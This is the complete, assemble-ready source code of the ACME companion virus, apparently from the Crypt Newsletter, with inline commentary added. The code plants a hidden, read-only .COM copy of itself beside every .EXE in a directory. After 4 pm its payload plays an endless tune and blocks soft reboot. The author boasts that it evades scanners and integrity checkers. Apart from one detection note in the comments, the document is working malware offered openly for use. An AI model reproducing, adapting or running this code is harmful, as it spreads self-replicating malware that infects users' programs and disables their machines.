; ACME COMPANION VIRUS for Crypt Newsletter 9
;
; ACME is a fast and simple companion virus which will create a
; spawned copy of itself for EVERY .EXE file it can find in the
; current directory.
;
; ACME is ready to assemble using A86. If you recall, an earlier Crypt
; letter included an A86-only source listing. (Strict TASM/MASM compatible
; assemblers will need the manual addition of a couple simple declarative
; statements.) I included ACME in this form so fans of Isaacson's
; technique can gloat about the code not requiring "red tape." ;-]
; A86 will assemble ACME directly to a .COM file virus, no linker
; necessary.
;
; ACME currently eludes all scanners and as a companion virus, openly
; defies every integrity checker I have in my inventory with the EXCEPTION
; of Stiller Research's. This issue includes a quality report on
; Solomon's Toolkit, so it's only fair to state that while the documentation
; for this product seems to indicate that the developers know what a
; companion infection is, the software does nothing to protect against
; it in default mode. ACME flies through the Toolkit, for now. Go figure.
;
; ACME will also play a generic ACME-style virus tune late in the
; afternoon. Those who fancy a musical virus but have never heard one are
; encouraged to play with ACME. Set your system clock to anytime after
; 4:00 pm. The musical payload takes up most of the space in this virus,
; removing it shaves the virus to 242 bytes - nice and small if you like.
;
; The virus purist may recognize the root of ACME as a piece of code known
; as ZENO - a small, single-step companion infector. ZENO's author is
; thanked, wherever he/she is.
;-----------------------------------------------------------------------
; Entry point and data area.
; Everything from START up to END_OF_CODE is the byte range Infect_file
; writes into each companion file, so these buffers travel with every copy
; in whatever state they are in at write time (Store_name fills FILE_FOUND
; with the host's name just before the copy is written).
;-----------------------------------------------------------------------
START:
jmp VIR_BEGIN ; get going
WILDCARD DB "*.EXE",0 ; find-first mask: every .EXE in the current directory
FILE_EXT DB "COM",0 ; extension Store_name patches over "EXE" in FILE_CREATE
FILE_FOUND DB 12 DUP(' '), 0 ; 8.3 name copied out of the DTA (the host .EXE)
FILE_CREATE DB 12 DUP(' '), 0 ; same name with .COM extension (the companion)
SEARCH_ATTRIB DW 17H ; find-first attribute mask (17h = read-only, hidden, system, directory)
NUM_INFECT DW 0 ; not referenced anywhere else in this listing
; MUZIK: note table consumed by TOON. Each entry is a word pair
; (PIT channel-2 divisor, repeat count): TOON sends the first word to
; port 42h and busy-waits the second word's number of delay loops.
; The word 0ffffh terminates the table.
MUZIK DW 4304,0006, 4063,0006, 4304,0006, 4063,0006, ;MUZIK - notes/delay
DW 3043,0006, 4831,0006, 4063,0006, 3043,0006, ;in format xxxx,yyyy
DW 4304,0006, 4063,0006, 4304,0006, 4063,0006,
DW 3043,0006, 4831,0006, 4063,0006, 3043,0006,
DW 4304,0006, 4063,0006, 4304,0006, 4063,0006,
DW 3043,0006, 4831,0006, 4063,0006, 3043,0006,
DW 4304,0006, 4063,0006, 4304,0006, 4063,0006,
DW 3043,0006, 5119,0006, 5423,0006, 3043,0006,
DW 6087,0020,

DW 6087,0006,
DW 7239,0006, 3619,0006, 4831,0006, 6087,0006
DW 7670,0006, 7239,0006, 4831,0006, 3619,0006

DW 6087,0006, 4063,0006, 3043,0006, 5119,0006
DW 4831,0006, 6087,0006, 7239,0006, 8126,0006
DW 6087,0020,

DW 4304,0006, 4063,0006, 4304,0006, 4063,0006,
DW 3043,0006, 4831,0006, 4063,0006, 3043,0006,
DW 4304,0006, 4063,0006, 4304,0006, 4063,0006,
DW 3043,0006, 4831,0006, 4063,0006, 3043,0006,
DW 4304,0006, 4063,0006, 4304,0006, 4063,0006,
DW 3043,0006, 5119,0006, 5423,0006, 3043,0006,
DW 6087,0020,

DW 6087,0006,
DW 7239,0006, 3619,0006, 4831,0006, 6087,0006
DW 7670,0006, 7239,0006, 4831,0006, 3619,0006

DW 6087,0006, 4063,0006, 3043,0006, 5119,0006
DW 4831,0006, 6087,0006, 7239,0006, 8126,0006
DW 6087,0020,

DW 7670,0006, 7239,0006, 4831,0006, 3619,0006
DW 3043,0006, 3619,0006, 4831,0006, 6087,0006
DW 3043,0010,

DW 4304,0006, 4063,0006, 4304,0006, 4063,0006,
DW 3043,0006, 4831,0006, 4063,0006, 3043,0006,
DW 4304,0006, 4063,0006, 4304,0006, 4063,0006,
DW 3043,0006, 4831,0006, 4063,0006, 3043,0006,
DW 4304,0006, 4063,0006, 4304,0006, 4063,0006,
DW 3043,0006, 5119,0006, 5423,0006, 3043,0006,
DW 6087,0020,

DW 7670,0006, 7239,0006, 4831,0006, 3619,0006
DW 3043,0006, 3619,0006, 4831,0006, 6087,0006
DW 3043,0010,

DW 6087,0006,
DW 7239,0006, 3619,0006, 4831,0006, 6087,0006
DW 7670,0006, 7239,0006, 4831,0006, 3619,0006

DW 6087,0006, 4063,0006, 3043,0006, 5119,0006
DW 4831,0006, 6087,0006, 7239,0006, 8126,0006
DW 6087,0020,

DW 0ffffh ; end-of-table marker tested by TOON2
; Command record handed to the command interpreter via int 2Eh at Exit:
; a length byte followed by the command text. Prepare_command fills CMD_LEN
; and appends the CR; FILE_CLONE is loaded from FILE_FOUND in Vir_begin.
My_Cmd:
CMD_LEN DB 13 ; length byte of the int 2Eh record (overwritten by Prepare_command)
FILE_CLONE DB 12 DUP (' '), 0 ; command text: name of the program to run
;------------------------------------------------------------------;
; Prepare_command - turn FILE_CLONE into an int 2Eh command record.
; In:    FILE_CLONE = NUL-terminated name (at most 12 bytes are scanned)
; Out:   CMD_LEN = 12 - CX remaining after the scan; a CR stored at DI
; Clobb: ax, cx, di, flags; leaves DF clear
; NOTE(review): repne scasb leaves DI one past the byte it matched, so the
;        CR is stored after the NUL rather than in its place, and CMD_LEN
;        counts the NUL as well.
;------------------------------------------------------------------;
Prepare_command:
cld
mov di,OFFSET FILE_CLONE
mov al,0
mov cx,12
repne scasb ; find the end of string \0

mov al,0Dh ; <CR>
stosb ; replace \0 with a <CR>

mov ax,12 ;store length of the command
sub ax,cx ; 12 - bytes left unscanned = bytes consumed by the scan
mov CMD_LEN, al
ret
;------------------------------------------------------------------;
; Store_name - copy the filename out of the DTA and derive the companion
; name from it.
; In:    offset 158 (9Eh) = filename field of the default DTA at PSP:80h,
;        holding the name returned by find-first / find-next
; Out:   FILE_FOUND = the found name; FILE_CREATE = the same name with the
;        three bytes after the first '.' overwritten by "COM"
; Clobb: al, cx, si, di, flags; leaves DF clear
; NOTE(review): the first two rep movsb run before cld, so they rely on
;        DF already being clear on entry.
;------------------------------------------------------------------;
Store_name:

mov di,OFFSET FILE_FOUND ;Point to buffer.
mov si,158 ;stow the file found in buffer
mov cx,12
rep movsb

mov di,OFFSET FILE_CREATE ;Point to buffer.
mov si,158
mov cx,12
rep movsb

cld
mov di,OFFSET FILE_CREATE
mov al,'.'
mov cx,9 ; at most 8 name bytes plus the '.'
repne scasb ;find the '.'

mov si,OFFSET FILE_EXT
mov cx,3
rep movsb ;replace the .EXE with .COM
;from buffer
ret
;------------------------------------------------------------------;
; Check_file - attempt to open FILE_CREATE read-only (int 21h / 3D00h).
; Out:   ax and CF as left by DOS (handle in ax on success)
; Clobb: ax, cx, dx, flags
; NOTE(review): neither this routine nor its caller examines the result,
;        and a handle obtained here is never closed; the caller goes on
;        to Infect_file regardless, which re-creates the companion.
;------------------------------------------------------------------;
;Does the file exist?

Check_file:
mov dx,OFFSET FILE_CREATE
mov cx,0 ; attribute argument (unused by 3Dh)
mov ax,3d00h ; Open file, read only
int 21h

Chk_done:
ret
;------------------------------------------------------------------;
; Infect_file - write the companion .COM for the current host.
;   1. int 21h/3Ch: create (or truncate) FILE_CREATE with normal
;      attributes. On CF set it jumps to EXIT; the return address stays
;      on the stack, but EXIT terminates the process so it is never popped.
;   2. int 21h/40h: write END_OF_CODE-START bytes starting at START, i.e.
;      the in-memory image including the data buffers as currently filled.
;   3. int 21h/3Eh: close the handle still held in bx.
;   4. int 21h/4301h: set attributes 3 (read-only + hidden) on the companion.
; Clobb: ax, bx, cx, dx, flags
; Detection note: a hidden, read-only .COM beside each .EXE in a directory,
;   every one the same size, is the footprint this routine leaves.
;------------------------------------------------------------------;
Infect_file: ;create companion routine

mov dx,OFFSET FILE_CREATE ;contains name of "companion"
mov cx,0 ; file attributes: normal
mov ah,3ch ;construct file
int 21h
jc EXIT ; create failed: fall into the normal exit path

;Write virus to companion file
mov bx,ax ; bx = handle returned by 3Ch
mov cx,(OFFSET END_OF_CODE - OFFSET START) ;virus length
mov dx,OFFSET START
mov ah,40h ;write to file function
int 21h ;do it

;Close file
mov ah,3eh ; ASSUMES bx still has file handle
int 21h

;Change attributes
mov dx,OFFSET FILE_CREATE ;of created file to
mov cx,3 ;(1) read only and (2) hidden
mov ax,4301h ; set file attributes
int 21h

ret
;------------------------------------------------------------------
; Read all the directory filenames and store as records in buffer.
;------------------------------------------------------------------
; Vir_begin - main flow.
;   Time gate: int 21h/2Ch returns the hour in CH; if it is >= 16 (4 pm)
;     control goes to TOON, which never returns, so after 4 pm nothing is
;     infected and the original program is not run either.
;   Memory: SP is moved to STACK_HERE and int 21h/4Ah shrinks the memory
;     block to (SP+15)/16 paragraphs (ES still holds the PSP, as on .COM entry).
;   FILE_FOUND -> FILE_CLONE: in a companion written by Infect_file,
;     FILE_FOUND holds the host .EXE name, so this becomes the command the
;     companion runs at Exit to start the original program.
;   Loop: find-first on WILDCARD with SEARCH_ATTRIB; for every match,
;     Store_name / Check_file / Infect_file, then find-next; the loop
;     repeats while ZF is clear after int 21h/4Fh.
;   Exit: Prepare_command builds the int 2Eh record from FILE_CLONE, the
;     command interpreter runs it, then int 21h/4C00h terminates.
;------------------------------------------------------------------

Vir_begin:
mov ah,02Ch ;DOS get time function
int 021h
mov al,ch ;Copy hour into AL
cbw ;Sign-extend AL into AX
cmp ax,0010h ;Did the function return 16 (4 pm)?
jge TOON ;If greater than or equal, muzik!


mov sp,offset STACK_HERE ;move stack down
mov bx,sp
add bx,15 ; round up to a whole paragraph
mov cl,4
shr bx,cl ; bx = bytes / 16 = paragraphs to keep
mov ah,4ah ;deallocate rest of memory
int 21h

mov di,OFFSET FILE_CLONE ;Point to buffer.
mov si,OFFSET FILE_FOUND ; name of the program this copy was created beside
mov cx,12
rep movsb

Read_dir: mov dx,OFFSET WILDCARD ;file mask for directory search
mov cx,SEARCH_ATTRIB

mov ah,4Eh ;find the first matching file
int 21h

jc EXIT ;If empty directory, exit

Do_file:
call STORE_NAME
call CHECK_FILE ; result is not examined
call INFECT_FILE



Find_next:
mov ah,4fh ; find next file and keep finding until
int 21h ; all
jnz Do_File ; infected

Exit:

; Run the original program
call Prepare_command
mov si, OFFSET MY_CMD
int 2Eh ; Pass command to command
; interpreter for execution

mov ax,4C00H ; Exit to DOS
int 21h
;-------------------------------------------------------------------
;This routine enables ACME virus to compel the pc to play the
;ACME virus song just about the time the clock-watchers are getting
;ready to leave
;-------------------------------------------------------------------
; TOON - payload: plays MUZIK through the PC speaker and never returns.
;   Interrupts are disabled (cli) while the table plays. 0B6h written to
;   port 43h selects PIT channel 2, lo/hi byte access, square-wave mode.
;   Per entry: divisor to port 42h (low byte then high byte), speaker
;   gate bits 0-1 of port 61h set, busy-wait of repeat-count x 8000
;   loop iterations (tempo therefore depends on CPU speed), speaker bits
;   cleared, next entry. At the 0ffffh terminator it re-enables interrupts
;   and jumps back to TOON, so the machine stays in this loop until reset
;   (as the author's comment at the end states).
; Clobb: ax, cx, si, flags, PIT channel 2, port 61h bits 0-1
;-------------------------------------------------------------------
TOON:
cli ;interrupts off
mov al,10110110xb ;the number
out 43h,al ;to send to the speaker
lea si,MUZIK ;point (si) to the ACME note table

TOON2: cld
lodsw ;load word into ax and increment (si)
cmp ax,0ffffh ;is it ffff? If so, end of table
jz GO_MUZIK2 ;so, time to jump into endless loop
out 42h,al ; divisor low byte
mov al,ah
out 42h,al ;send it next
in al,61h ;get value to turn on speaker
or al,00000011xb ;OR the gotten value
out 61h,al ;now we turn on speaker
lodsw ;load the repeat loop count into (ax)
LOOP6:
mov cx,8000 ;delay count
LOOP7:
loop LOOP7 ;do the delay
dec ax ;decrement repeat count
jnz LOOP6 ;if not = 0 loop back
in al,61h ;all done
and al,11111100xb ;number turns speaker off
out 61h,al ;send it
jmp short TOON2 ;now go do next note
GO_MUZIK2: ;our loop point

sti ;enable interrupts
jmp TOON ;jump back to beginning - this code
; has the additional advantage of
;locking out CTRL-ALT-DEL reboot.
;The user must do a hard reset to recover from ACME.
END_OF_CODE = $ ; one past the last byte Infect_file writes into a companion

STACK_HERE EQU END_OF_CODE + 512 ; Vir_begin sets SP here: 512 bytes of stack above the image
; ═════════════════════════════════════════════════════════════════════════
; ════════════════════> and Remember Don't Forget to Call <════════════════
; ════════════> ARRESTED DEVELOPMENT +31.79.426o79 H/P/A/V/AV/? <══════════
; ═════════════════════════════════════════════════════════════════════════